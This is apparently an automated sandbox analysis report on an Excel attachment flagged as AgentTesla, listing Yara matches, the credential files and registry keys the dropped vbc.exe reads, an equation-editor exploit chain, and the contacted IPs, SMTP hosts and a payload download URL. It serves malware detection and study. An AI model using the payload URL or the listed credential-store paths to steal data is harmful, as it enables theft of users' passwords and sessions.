Source: Yara match File source: 00000004.00000002.2134126371.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.2a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.580000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348216002.0000000002401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2138307858.0000000002EAB000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348263870.0000000002454000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2133236843.000000000044B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347334387.00000000002A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347423777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347280269.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2138244696.0000000002E62000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347452844.000000000044B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347308194.0000000000262000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348216002.0000000002401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2134126371.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.2a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.580000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.3.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 321136 Sample: PO1.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Found malware configuration 2->37 39 Antivirus detection for URL or domain 2->39 41 13 other signatures 2->41 7 EQNEDT32.EXE 11 2->7         started        12 EXCEL.EXE 37 17 2->12         started        process3 dnsIp4 33 192.3.141.160, 49167, 80 AS-COLOCROSSINGUS United States 7->33 21 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 51 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->51 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$PO1.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 53 Detected unpacking (changes PE section rights) 14->53 55 Detected unpacking (overwrites its own PE header) 14->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->57 59 4 other signatures 14->59 17 vbc.exe 12 12 14->17         started        process9 dnsIp10 27 smtp.tzdieep.net 17->27 29 us2.smtp.mailhostbox.com 208.91.199.223, 49170, 49171, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->29 31 3 other IPs or domains 17->31 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->43 45 Tries to steal Mail credentials (via file access) 17->45 47 Tries to harvest and steal ftp login credentials 17->47 49 Tries to harvest and steal browser information (history, passwords, etc) 17->49 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.3.141.160
 unknown United States
36352 AS-COLOCROSSINGUS true
208.91.199.223
 unknown United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
174.129.214.20
 unknown United States
14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
elb097307-934924932.us-east-1.elb.amazonaws.com 174.129.214.20 true
us2.smtp.mailhostbox.com 208.91.199.223 true
smtp.tzdieep.net unknown unknown
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.3.141.160/document/vbc.exe true
  • Avira URL Cloud: malware
 unknown